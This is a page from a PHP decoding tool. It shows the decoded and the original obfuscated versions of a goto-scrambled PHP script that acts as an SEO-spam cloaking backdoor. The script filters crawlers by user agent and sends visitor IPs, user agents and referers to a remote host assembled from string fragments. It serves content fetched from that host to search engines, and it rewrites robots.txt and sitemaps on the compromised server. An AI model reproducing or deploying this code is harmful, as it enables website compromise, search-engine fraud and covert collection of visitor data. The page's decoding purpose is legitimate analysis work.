Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto EGxAW; N6UJ2: exit; goto eh_Vu; qOarP: $krIiJ = "\x2f"; goto Ku22p; llmDB: if..

Decoded Output download

<?php 
 goto EGxAW; N6UJ2: exit; goto eh_Vu; qOarP: $krIiJ = "/"; goto Ku22p; llmDB: if (!empty($qseEZ)) { goto wQG6B; } goto fsccf; LhsHF: if (!preg_match("/(Scrapy|askTbFXTV|heritrix|mj12bot|amazonBot|OBot|Python-requests|Bytespider|httpClient|FeedDemon|YandexBot|indy Library|Java|ahrefsBot|JikeSpider|EasouSpider|swiftbot|LightDeckReports Bot|universalFeedParser|Feedly|ApacheBench|coolpadWebkit|PetalBot|Barkrowler|yySpider|Python|Ezooms|jaunty|Python-urllib|ZmEu|CrawlDaddy|semrushBot|DigExt|yisouSpider|Paloaltonetworks)/i", $_SERVER["HTTP_USER_AGENT"])) { goto xq6hg; } goto nGfsC; lzzwU: goto Ij35D; goto Un1zy; iItjS: if (!file_exists("zbs.txt")) { goto z2K6N; } goto lrBpp; MUjR3: $I0YU3 = "esbia"; goto SH859; q5Q61: mFrTn: goto oRwZA; MLtfI: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYPEER, FALSE); goto hHR8Y; dxRC2: $Ulz5H = curl_exec($mBWcV); goto IpYGs; qTys4: echo $Ulz5H; goto llmDB; Gsg7Z: $krIiJ = $_SERVER["SCRIPT_NAME"]; goto AQdvE; eTegC: $Ulz5H = @file_get_contents($Byl92); goto v9sqk; gQxFU: KQjUq: goto qTys4; YLd9G: if (!empty($Ulz5H)) { goto y_NYM; } goto qx4wW; mlZsw: $mBWcV = curl_init(); goto KLnRW; N_wlZ: $ZhZ2L = urlencode($_SERVER["HTTP_HOST"]); goto VzBhs; stvJP: curl_setopt($mBWcV, CURLOPT_RETURNTRANSFER, true); goto uJbGa; eh_Vu: y6J6f: goto D_6ic; Un1zy: h7x6e: goto eonpR; VzBhs: $JCsI7 = urlencode($_SERVER["SCRIPT_NAME"]); goto QxTmb; RXSz1: Rbh9Y: goto vsGVz; Kl32c: $Gdiby = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto hZyEB; lvK7t: sSNVV: goto vQjOE; X4XC0: $Gdiby = $_SERVER["REMOTE_ADDR"]; goto b3wZ6; uGB2Z: curl_close($mBWcV); goto lSyG1; LZ4QY: @file_put_contents("zbs.txt", "1"); goto eFSUZ; MASAV: $krIiJ = $krIiJ . "?"; goto oOQMg; uXWBE: $B_e_O = "Google|Docomo|Bing|Yahoo"; goto qad2H; h8u0A: z2K6N: goto mxaQY; LsxkK: $TH0Rn = "Bw4DWQM"; goto uXWBE; eonpR: $Gdiby = $_SERVER["HTTP_CLIENT_IP"]; goto TMghE; A2tSS: $Mlzy7 = urlencode($_SERVER["HTTP_USER_AGENT"]); goto K8H9D; SKKnv: exit; goto B4vFu; WARft: $oa6Y4 = "http:/"; goto UUaH0; D0EFN: qq3rZ: goto UsJLc; kk9sj: jMpls: goto eTegC; IDi9C: exit; goto oGVOQ; ZOwkj: goto XCrer; goto D0EFN; cnlLN: echo $ZlnU_ . ": " . $I9MsC . "<br/>"; goto tFXj1; A6xTg: $qseEZ = ''; goto aGwIJ; mHV52: NrbGz: goto jPxtC; Bqfcj: t_TgF: goto f0XjN; HwiIo: goto yPOvF; goto NpqK9; eFSUZ: XCrer: goto lvK7t; mOkiH: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYHOST, FALSE); goto dxRC2; Ku22p: goto tSDOF; goto XsI0O; oN6Bj: CUykE: goto IDi9C; maP_x: AT7Bc: goto wEp6v; pGcZp: goto NrbGz; goto Bqfcj; aGwIJ: if (!(strpos($TA6c3, "pingsitemap") !== false)) { goto jMpls; } goto Gsg7Z; mOfHC: if ($Gxvtk == 0) { goto BMFWF; } goto qOarP; VUmEh: if (!(substr($Ulz5H, 0, 10) == "error code" || $Ulz5H == "500")) { goto eUIoC; } goto yMQ8M; sOQAi: goto cO5m4; goto Ya4nl; IpYGs: curl_close($mBWcV); goto M7p17; Ya4nl: vog70: goto jjvbc; nGfsC: header("HTTP/1.0 403 Forbidden"); goto SKKnv; mMO2n: $qseEZ = trim($qseEZ) . "
" . "Sitemap: {$ZlnU_}"; goto i7gis; oOQMg: goto BNqZn; goto RLUyN; i7gis: $I9MsC = ''; goto cnlLN; oGVOQ: return; goto yshtG; oRwZA: $U0oOZ = urlencode($_SERVER["REQUEST_SCHEME"]); goto IEsm1; NpqK9: O1ba0: goto iTbje; hZyEB: Ij35D: goto Cp34U; qBlWn: tSDOF: goto b14fk; jPxtC: goto KQjUq; goto jhgKd; M7p17: H8WoK: goto UmxGB; NJeSj: $krIiJ = "/?"; goto qBlWn; L5Ur7: yPOvF: goto sOQAi; AXK78: goto mFrTn; goto RXSz1; vsGVz: $_SERVER["REQUEST_SCHEME"] = "https"; goto q5Q61; AhBPn: goto sSNVV; goto h8u0A; tFXj1: $Byl92 = $Sx0iL . "?agent={$Mlzy7}&refer={$GDylB}&lang={$bgSif}&ip={$Gdiby}&dom={$ZhZ2L}&http={$U0oOZ}&uri={$TA6c3}&pc={$TH0Rn}&rewriteable={$Gxvtk}&script={$JCsI7}&sitemap=" . urlencode($ZlnU_); goto kk9sj; ll8NF: curl_setopt($mBWcV, CURLOPT_RETURNTRANSFER, true); goto ZdU6r; K8H9D: $bgSif = urlencode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]); goto X4XC0; jhgKd: GJVtV: goto e0wEf; qx4wW: $mBWcV = curl_init(); goto l9shy; xPsmT: $GDylB = urlencode(@$_SERVER["HTTP_REFERER"]); goto A2tSS; WQrgA: exit; goto mq8qQ; AQdvE: if (strpos($krIiJ, "index.ph") !== false) { goto fsQJN; } goto MASAV; UsJLc: $Gxvtk = 1; goto LZ4QY; wEp6v: goto CUykE; goto kydvu; g7vv0: if ($Ulz5H == "ok") { goto qq3rZ; } goto EVTtV; f0XjN: header("Content-Type: text/xml; charset=utf-8"); goto mHV52; v9sqk: if (!empty($Ulz5H)) { goto H8WoK; } goto mlZsw; mxaQY: $Bxp0f = $U0oOZ . "://" . $_SERVER["HTTP_HOST"] . "/zbszbs"; goto Vq5Lk; y6X05: $_SERVER["REQUEST_SCHEME"] = "http"; goto AXK78; lSyG1: y_NYM: goto g7vv0; iTbje: $Byl92 = $Sx0iL . "?agent={$Mlzy7}&refer={$GDylB}&lang={$bgSif}&ip={$Gdiby}&dom={$ZhZ2L}&http={$U0oOZ}&uri={$TA6c3}&pc={$TH0Rn}&rewriteable={$Gxvtk}&script={$JCsI7}"; goto A6xTg; GHu3w: if (strpos($TA6c3, "robots.txt") !== false || strpos($TA6c3, "pingsitemap") !== false || strpos($TA6c3, "jp2023") !== false || preg_match("@^/(.*?).xml$@i", $_SERVER["REQUEST_URI"]) || preg_match("/({$B_e_O})/i", $_SERVER["HTTP_USER_AGENT"]) || preg_match("/({$B_e_O})/i", $_SERVER["HTTP_REFERER"])) { goto O1ba0; } goto HwiIo; fsccf: if (!(strpos($TA6c3, "robots.txt") !== false)) { goto AT7Bc; } goto Mxp2W; b14fk: BNqZn: goto Ke7Ph; UUaH0: $Sx0iL = $oa6Y4 . $X2_bn . $I0YU3 . $ZL_1t . $SczT2 . $AbFbh; goto LsxkK; l9shy: curl_setopt($mBWcV, CURLOPT_URL, $Bxp0f); goto ll8NF; xWz2I: $Ulz5H = curl_exec($mBWcV); goto uGB2Z; kydvu: wQG6B: goto ab7ca; B4vFu: xq6hg: goto xPsmT; Mxp2W: @file_put_contents("robots.txt", $Ulz5H); goto maP_x; qad2H: error_reporting(0); goto LhsHF; hHR8Y: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYHOST, FALSE); goto xWz2I; mq8qQ: eUIoC: goto rEO0i; yshtG: fw8Kt: goto L5Ur7; yMQ8M: header("HTTP/1.0 500 Internal Server Error"); goto WQrgA; Psw0h: echo "ok"; goto N6UJ2; rEO0i: if (strpos($TA6c3, "jp2023") !== false || preg_match("/({$B_e_O})/i", $_SERVER["HTTP_REFERER"])) { goto GJVtV; } goto uT2s5; uJbGa: curl_setopt($mBWcV, CURLOPT_FOLLOWLOCATION, false); goto Vu0aZ; Ke7Ph: $qseEZ = "User-agent: *\xd\xaAllow: /"; goto vaNuQ; FVIwh: $ZL_1t = "n"; goto iAe5_; EGxAW: $X2_bn = "/cw994.l"; goto FVIwh; RLUyN: fsQJN: goto mOfHC; XsI0O: BMFWF: goto NJeSj; Vq5Lk: $Ulz5H = @file_get_contents($Bxp0f); goto YLd9G; b3wZ6: if (isset($_SERVER["HTTP_CLIENT_IP"])) { goto h7x6e; } goto hD0eQ; KLnRW: curl_setopt($mBWcV, CURLOPT_URL, $Byl92); goto stvJP; Vu0aZ: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYPEER, FALSE); goto mOkiH; vQjOE: if (strpos($TA6c3, "favicon.ico") !== false) { goto vog70; } goto GHu3w; uT2s5: if (substr($Ulz5H, 0, 5) == "<?xml") { goto t_TgF; } goto KjSJM; UmxGB: if (empty($Ulz5H)) { goto fw8Kt; } goto VUmEh; HgOII: @file_put_contents("zbs.txt", "0"); goto ZOwkj; vaNuQ: $ZlnU_ = "{$U0oOZ}://" . $ZhZ2L . $krIiJ . "sitemap.xml"; goto mMO2n; IEsm1: $TA6c3 = urlencode($_SERVER["REQUEST_URI"]); goto xN7ca; UdGdt: xkp_y: goto Kl32c; lrBpp: $Gxvtk = @file_get_contents("zbs.txt"); goto AhBPn; ZdU6r: curl_setopt($mBWcV, CURLOPT_FOLLOWLOCATION, false); goto MLtfI; KjSJM: header("Content-Type: text/html; charset=utf-8"); goto pGcZp; ab7ca: @file_put_contents("robots.txt", $qseEZ); goto oN6Bj; D_6ic: $Gxvtk = 0; goto iItjS; SH859: $AbFbh = "shop/"; goto WARft; xN7ca: if (!(strpos($TA6c3, "zbszbs") !== false)) { goto y6J6f; } goto Psw0h; TMghE: goto Ij35D; goto UdGdt; EVTtV: $Gxvtk = 0; goto HgOII; QxTmb: if (!empty($_SERVER["REQUEST_SCHEME"]) && $_SERVER["REQUEST_SCHEME"] == "https" || !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || !empty($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == "443" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https") { goto Rbh9Y; } goto y6X05; iAe5_: $SczT2 = "town."; goto MUjR3; hD0eQ: if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { goto xkp_y; } goto lzzwU; Cp34U: $Gdiby = urlencode($Gdiby); goto N_wlZ; e0wEf: header("HTTP/1.1 404 Not Found"); goto gQxFU; jjvbc: cO5m4: 
?>

Did this file decode correctly?

Original Code

<?php
 goto EGxAW; N6UJ2: exit; goto eh_Vu; qOarP: $krIiJ = "\x2f"; goto Ku22p; llmDB: if (!empty($qseEZ)) { goto wQG6B; } goto fsccf; LhsHF: if (!preg_match("\57\50\123\143\x72\x61\x70\x79\174\x61\163\153\124\142\x46\x58\x54\x56\x7c\150\x65\x72\151\x74\162\151\170\x7c\155\152\61\62\142\157\x74\174\x61\155\141\x7a\x6f\156\102\157\164\x7c\117\102\x6f\x74\174\x50\171\x74\150\x6f\x6e\55\x72\x65\x71\165\x65\x73\164\x73\x7c\x42\x79\164\145\x73\x70\x69\x64\x65\x72\174\150\164\164\160\103\x6c\x69\145\156\x74\x7c\106\145\x65\144\x44\145\x6d\x6f\x6e\174\131\141\x6e\144\x65\170\102\157\164\174\x69\x6e\144\x79\40\x4c\x69\x62\x72\x61\x72\171\x7c\x4a\141\166\141\x7c\x61\150\162\145\146\x73\102\x6f\x74\174\112\x69\x6b\145\x53\x70\x69\144\x65\162\x7c\x45\x61\163\157\x75\x53\160\x69\x64\145\162\174\163\x77\151\146\164\142\x6f\x74\174\x4c\x69\x67\150\x74\x44\x65\x63\153\122\x65\160\157\x72\x74\163\40\x42\157\x74\x7c\x75\x6e\x69\166\x65\162\x73\141\154\x46\x65\x65\144\x50\141\162\x73\145\x72\x7c\106\x65\x65\x64\154\x79\x7c\x41\x70\141\143\150\x65\102\x65\x6e\x63\x68\x7c\x63\x6f\x6f\x6c\160\x61\144\127\145\142\153\x69\164\x7c\x50\x65\x74\141\154\102\x6f\x74\x7c\x42\141\162\x6b\162\157\x77\x6c\145\x72\x7c\171\x79\123\160\x69\144\145\162\174\120\171\x74\150\x6f\x6e\x7c\105\x7a\157\157\x6d\x73\x7c\152\x61\165\x6e\x74\171\174\x50\x79\164\x68\x6f\x6e\55\x75\162\x6c\x6c\151\142\174\132\155\105\165\x7c\x43\x72\x61\x77\x6c\x44\x61\x64\144\171\174\163\145\x6d\x72\x75\x73\150\102\157\164\174\104\151\x67\105\x78\164\x7c\171\x69\x73\157\165\123\160\151\x64\145\162\x7c\120\141\154\x6f\x61\x6c\x74\x6f\156\x65\164\x77\157\162\153\163\x29\57\151", $_SERVER["\x48\124\124\120\x5f\x55\x53\x45\x52\137\x41\107\105\x4e\124"])) { goto xq6hg; } goto nGfsC; lzzwU: goto Ij35D; goto Un1zy; iItjS: if (!file_exists("\172\142\x73\56\164\x78\x74")) { goto z2K6N; } goto lrBpp; MUjR3: $I0YU3 = "\145\163\142\151\141"; goto SH859; q5Q61: mFrTn: goto oRwZA; MLtfI: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYPEER, FALSE); goto hHR8Y; dxRC2: $Ulz5H = curl_exec($mBWcV); goto IpYGs; qTys4: echo $Ulz5H; goto llmDB; Gsg7Z: $krIiJ = $_SERVER["\123\x43\122\111\120\124\x5f\116\101\x4d\x45"]; goto AQdvE; eTegC: $Ulz5H = @file_get_contents($Byl92); goto v9sqk; gQxFU: KQjUq: goto qTys4; YLd9G: if (!empty($Ulz5H)) { goto y_NYM; } goto qx4wW; mlZsw: $mBWcV = curl_init(); goto KLnRW; N_wlZ: $ZhZ2L = urlencode($_SERVER["\x48\124\x54\x50\x5f\110\117\123\124"]); goto VzBhs; stvJP: curl_setopt($mBWcV, CURLOPT_RETURNTRANSFER, true); goto uJbGa; eh_Vu: y6J6f: goto D_6ic; Un1zy: h7x6e: goto eonpR; VzBhs: $JCsI7 = urlencode($_SERVER["\x53\x43\122\x49\120\124\x5f\x4e\101\115\x45"]); goto QxTmb; RXSz1: Rbh9Y: goto vsGVz; Kl32c: $Gdiby = $_SERVER["\110\x54\124\120\x5f\x58\x5f\106\x4f\x52\x57\101\122\104\x45\104\137\106\117\x52"]; goto hZyEB; lvK7t: sSNVV: goto vQjOE; X4XC0: $Gdiby = $_SERVER["\122\105\x4d\117\124\x45\x5f\101\104\104\122"]; goto b3wZ6; uGB2Z: curl_close($mBWcV); goto lSyG1; LZ4QY: @file_put_contents("\x7a\142\163\56\x74\170\164", "\61"); goto eFSUZ; MASAV: $krIiJ = $krIiJ . "\x3f"; goto oOQMg; uXWBE: $B_e_O = "\107\157\157\147\x6c\x65\x7c\x44\157\x63\157\155\157\x7c\102\x69\156\x67\x7c\131\x61\150\157\157"; goto qad2H; h8u0A: z2K6N: goto mxaQY; LsxkK: $TH0Rn = "\x42\x77\x34\x44\127\x51\115"; goto uXWBE; eonpR: $Gdiby = $_SERVER["\110\124\x54\120\x5f\x43\114\111\x45\116\124\x5f\x49\120"]; goto TMghE; A2tSS: $Mlzy7 = urlencode($_SERVER["\x48\124\124\x50\137\125\x53\x45\122\137\101\x47\105\116\x54"]); goto K8H9D; SKKnv: exit; goto B4vFu; WARft: $oa6Y4 = "\150\x74\164\160\72\x2f"; goto UUaH0; D0EFN: qq3rZ: goto UsJLc; kk9sj: jMpls: goto eTegC; IDi9C: exit; goto oGVOQ; ZOwkj: goto XCrer; goto D0EFN; cnlLN: echo $ZlnU_ . "\x3a\40" . $I9MsC . "\74\142\x72\57\x3e"; goto tFXj1; A6xTg: $qseEZ = ''; goto aGwIJ; mHV52: NrbGz: goto jPxtC; Bqfcj: t_TgF: goto f0XjN; HwiIo: goto yPOvF; goto NpqK9; eFSUZ: XCrer: goto lvK7t; mOkiH: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYHOST, FALSE); goto dxRC2; Ku22p: goto tSDOF; goto XsI0O; oN6Bj: CUykE: goto IDi9C; maP_x: AT7Bc: goto wEp6v; pGcZp: goto NrbGz; goto Bqfcj; aGwIJ: if (!(strpos($TA6c3, "\160\x69\156\147\163\x69\x74\145\x6d\x61\160") !== false)) { goto jMpls; } goto Gsg7Z; mOfHC: if ($Gxvtk == 0) { goto BMFWF; } goto qOarP; VUmEh: if (!(substr($Ulz5H, 0, 10) == "\x65\162\x72\157\162\40\x63\x6f\144\x65" || $Ulz5H == "\x35\x30\60")) { goto eUIoC; } goto yMQ8M; sOQAi: goto cO5m4; goto Ya4nl; IpYGs: curl_close($mBWcV); goto M7p17; Ya4nl: vog70: goto jjvbc; nGfsC: header("\x48\124\x54\120\x2f\61\x2e\x30\x20\x34\x30\63\x20\106\x6f\162\x62\151\144\x64\x65\156"); goto SKKnv; mMO2n: $qseEZ = trim($qseEZ) . "\15\12" . "\123\151\164\x65\x6d\x61\160\x3a\x20{$ZlnU_}"; goto i7gis; oOQMg: goto BNqZn; goto RLUyN; i7gis: $I9MsC = ''; goto cnlLN; oGVOQ: return; goto yshtG; oRwZA: $U0oOZ = urlencode($_SERVER["\x52\105\121\x55\105\x53\x54\x5f\x53\103\110\x45\115\105"]); goto IEsm1; NpqK9: O1ba0: goto iTbje; hZyEB: Ij35D: goto Cp34U; qBlWn: tSDOF: goto b14fk; jPxtC: goto KQjUq; goto jhgKd; M7p17: H8WoK: goto UmxGB; NJeSj: $krIiJ = "\57\x3f"; goto qBlWn; L5Ur7: yPOvF: goto sOQAi; AXK78: goto mFrTn; goto RXSz1; vsGVz: $_SERVER["\x52\x45\121\x55\105\123\124\137\123\x43\110\x45\x4d\x45"] = "\150\164\164\x70\163"; goto q5Q61; AhBPn: goto sSNVV; goto h8u0A; tFXj1: $Byl92 = $Sx0iL . "\77\x61\147\x65\156\164\75{$Mlzy7}\46\x72\145\x66\x65\162\75{$GDylB}\46\154\141\156\147\x3d{$bgSif}\x26\151\160\x3d{$Gdiby}\x26\x64\x6f\x6d\x3d{$ZhZ2L}\x26\x68\x74\x74\x70\x3d{$U0oOZ}\x26\x75\x72\x69\x3d{$TA6c3}\46\x70\143\x3d{$TH0Rn}\x26\x72\x65\x77\162\151\x74\x65\141\x62\x6c\145\x3d{$Gxvtk}\x26\x73\143\162\x69\x70\164\x3d{$JCsI7}\x26\163\x69\x74\x65\x6d\x61\x70\75" . urlencode($ZlnU_); goto kk9sj; ll8NF: curl_setopt($mBWcV, CURLOPT_RETURNTRANSFER, true); goto ZdU6r; K8H9D: $bgSif = urlencode(@$_SERVER["\x48\124\124\120\x5f\101\x43\103\x45\120\x54\137\114\101\x4e\107\x55\x41\x47\105"]); goto X4XC0; jhgKd: GJVtV: goto e0wEf; qx4wW: $mBWcV = curl_init(); goto l9shy; xPsmT: $GDylB = urlencode(@$_SERVER["\x48\124\x54\x50\x5f\122\x45\x46\105\x52\105\122"]); goto A2tSS; WQrgA: exit; goto mq8qQ; AQdvE: if (strpos($krIiJ, "\151\x6e\x64\x65\170\x2e\x70\150") !== false) { goto fsQJN; } goto MASAV; UsJLc: $Gxvtk = 1; goto LZ4QY; wEp6v: goto CUykE; goto kydvu; g7vv0: if ($Ulz5H == "\x6f\x6b") { goto qq3rZ; } goto EVTtV; f0XjN: header("\103\x6f\156\x74\x65\156\x74\x2d\x54\171\160\x65\72\40\164\x65\x78\x74\x2f\170\x6d\154\x3b\x20\143\150\x61\162\x73\x65\164\75\165\164\146\x2d\x38"); goto mHV52; v9sqk: if (!empty($Ulz5H)) { goto H8WoK; } goto mlZsw; mxaQY: $Bxp0f = $U0oOZ . "\x3a\57\57" . $_SERVER["\x48\x54\124\120\x5f\110\x4f\123\124"] . "\57\172\x62\163\172\x62\x73"; goto Vq5Lk; y6X05: $_SERVER["\122\x45\x51\x55\x45\123\124\x5f\123\103\x48\105\115\105"] = "\x68\164\164\160"; goto AXK78; lSyG1: y_NYM: goto g7vv0; iTbje: $Byl92 = $Sx0iL . "\x3f\x61\x67\x65\156\x74\75{$Mlzy7}\46\162\145\146\x65\x72\x3d{$GDylB}\46\x6c\x61\x6e\147\x3d{$bgSif}\x26\151\160\x3d{$Gdiby}\46\x64\157\x6d\x3d{$ZhZ2L}\46\x68\x74\x74\160\75{$U0oOZ}\46\x75\162\151\x3d{$TA6c3}\x26\160\143\x3d{$TH0Rn}\x26\162\x65\x77\x72\x69\x74\145\141\142\x6c\x65\75{$Gxvtk}\46\163\x63\162\x69\x70\164\x3d{$JCsI7}"; goto A6xTg; GHu3w: if (strpos($TA6c3, "\x72\157\x62\157\x74\x73\x2e\164\170\164") !== false || strpos($TA6c3, "\x70\x69\156\147\163\x69\x74\x65\x6d\x61\x70") !== false || strpos($TA6c3, "\x6a\x70\x32\60\x32\x33") !== false || preg_match("\100\x5e\x2f\50\56\52\77\51\x2e\x78\x6d\x6c\x24\100\151", $_SERVER["\122\105\x51\125\105\x53\x54\x5f\x55\122\x49"]) || preg_match("\x2f\x28{$B_e_O}\x29\57\151", $_SERVER["\x48\x54\x54\120\137\125\123\x45\x52\x5f\x41\107\x45\x4e\124"]) || preg_match("\x2f\50{$B_e_O}\51\57\151", $_SERVER["\x48\124\x54\x50\137\x52\105\106\105\122\x45\x52"])) { goto O1ba0; } goto HwiIo; fsccf: if (!(strpos($TA6c3, "\x72\x6f\142\157\164\163\x2e\164\x78\x74") !== false)) { goto AT7Bc; } goto Mxp2W; b14fk: BNqZn: goto Ke7Ph; UUaH0: $Sx0iL = $oa6Y4 . $X2_bn . $I0YU3 . $ZL_1t . $SczT2 . $AbFbh; goto LsxkK; l9shy: curl_setopt($mBWcV, CURLOPT_URL, $Bxp0f); goto ll8NF; xWz2I: $Ulz5H = curl_exec($mBWcV); goto uGB2Z; kydvu: wQG6B: goto ab7ca; B4vFu: xq6hg: goto xPsmT; Mxp2W: @file_put_contents("\162\157\142\157\164\163\56\x74\x78\164", $Ulz5H); goto maP_x; qad2H: error_reporting(0); goto LhsHF; hHR8Y: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYHOST, FALSE); goto xWz2I; mq8qQ: eUIoC: goto rEO0i; yshtG: fw8Kt: goto L5Ur7; yMQ8M: header("\x48\124\x54\120\57\61\x2e\x30\x20\65\x30\x30\40\x49\156\x74\x65\x72\156\x61\154\40\123\145\x72\166\145\162\x20\105\x72\162\x6f\162"); goto WQrgA; Psw0h: echo "\x6f\153"; goto N6UJ2; rEO0i: if (strpos($TA6c3, "\152\x70\62\60\62\63") !== false || preg_match("\57\x28{$B_e_O}\x29\x2f\x69", $_SERVER["\x48\x54\124\x50\x5f\x52\x45\x46\x45\x52\105\x52"])) { goto GJVtV; } goto uT2s5; uJbGa: curl_setopt($mBWcV, CURLOPT_FOLLOWLOCATION, false); goto Vu0aZ; Ke7Ph: $qseEZ = "\x55\163\145\x72\55\x61\x67\x65\156\x74\x3a\x20\52\xd\xa\101\x6c\x6c\x6f\x77\72\x20\57"; goto vaNuQ; FVIwh: $ZL_1t = "\x6e"; goto iAe5_; EGxAW: $X2_bn = "\x2f\143\167\71\x39\x34\x2e\x6c"; goto FVIwh; RLUyN: fsQJN: goto mOfHC; XsI0O: BMFWF: goto NJeSj; Vq5Lk: $Ulz5H = @file_get_contents($Bxp0f); goto YLd9G; b3wZ6: if (isset($_SERVER["\110\124\x54\120\137\x43\x4c\111\x45\x4e\x54\137\x49\x50"])) { goto h7x6e; } goto hD0eQ; KLnRW: curl_setopt($mBWcV, CURLOPT_URL, $Byl92); goto stvJP; Vu0aZ: curl_setopt($mBWcV, CURLOPT_SSL_VERIFYPEER, FALSE); goto mOkiH; vQjOE: if (strpos($TA6c3, "\x66\141\x76\151\143\x6f\156\x2e\151\x63\157") !== false) { goto vog70; } goto GHu3w; uT2s5: if (substr($Ulz5H, 0, 5) == "\74\77\170\155\x6c") { goto t_TgF; } goto KjSJM; UmxGB: if (empty($Ulz5H)) { goto fw8Kt; } goto VUmEh; HgOII: @file_put_contents("\x7a\x62\163\x2e\164\x78\164", "\x30"); goto ZOwkj; vaNuQ: $ZlnU_ = "{$U0oOZ}\x3a\x2f\57" . $ZhZ2L . $krIiJ . "\163\x69\x74\145\155\141\160\x2e\x78\x6d\154"; goto mMO2n; IEsm1: $TA6c3 = urlencode($_SERVER["\122\x45\x51\x55\105\123\124\x5f\125\122\x49"]); goto xN7ca; UdGdt: xkp_y: goto Kl32c; lrBpp: $Gxvtk = @file_get_contents("\172\x62\x73\x2e\164\x78\164"); goto AhBPn; ZdU6r: curl_setopt($mBWcV, CURLOPT_FOLLOWLOCATION, false); goto MLtfI; KjSJM: header("\103\x6f\156\164\x65\156\x74\x2d\124\171\160\145\72\x20\164\145\x78\164\57\x68\164\x6d\x6c\73\x20\143\x68\141\162\x73\x65\x74\75\x75\x74\146\x2d\x38"); goto pGcZp; ab7ca: @file_put_contents("\162\x6f\142\157\164\163\x2e\164\170\x74", $qseEZ); goto oN6Bj; D_6ic: $Gxvtk = 0; goto iItjS; SH859: $AbFbh = "\x73\150\157\160\x2f"; goto WARft; xN7ca: if (!(strpos($TA6c3, "\172\142\163\172\142\163") !== false)) { goto y6J6f; } goto Psw0h; TMghE: goto Ij35D; goto UdGdt; EVTtV: $Gxvtk = 0; goto HgOII; QxTmb: if (!empty($_SERVER["\x52\x45\121\x55\x45\123\124\x5f\123\103\x48\105\x4d\x45"]) && $_SERVER["\x52\x45\121\125\105\x53\x54\137\x53\x43\110\105\115\105"] == "\150\x74\x74\x70\163" || !empty($_SERVER["\110\x54\124\120\123"]) && $_SERVER["\x48\124\124\x50\123"] == "\x6f\156" || !empty($_SERVER["\123\x45\122\x56\x45\x52\137\120\x4f\122\x54"]) && $_SERVER["\x53\105\x52\126\105\122\x5f\x50\117\x52\124"] == "\64\x34\63" || isset($_SERVER["\110\124\x54\x50\x5f\x58\137\106\117\x52\x57\101\122\x44\x45\x44\137\120\122\x4f\124\117"]) && $_SERVER["\110\x54\124\x50\137\x58\x5f\x46\117\122\127\101\x52\104\105\104\137\x50\122\117\124\x4f"] == "\150\x74\164\160\163") { goto Rbh9Y; } goto y6X05; iAe5_: $SczT2 = "\164\157\167\x6e\56"; goto MUjR3; hD0eQ: if (isset($_SERVER["\x48\124\124\120\x5f\130\x5f\x46\117\x52\127\x41\122\104\105\104\x5f\x46\117\122"])) { goto xkp_y; } goto lzzwU; Cp34U: $Gdiby = urlencode($Gdiby); goto N_wlZ; e0wEf: header("\110\x54\124\x50\57\61\x2e\x31\x20\x34\x30\x34\x20\116\157\164\40\106\x6f\165\156\x64"); goto gQxFU; jjvbc: cO5m4:
?>

Function Calls

None

Variables

None

Stats

MD5 b3dd74e31874e4ca062c032046276bdd
Eval Count 0
Decode Time 67 ms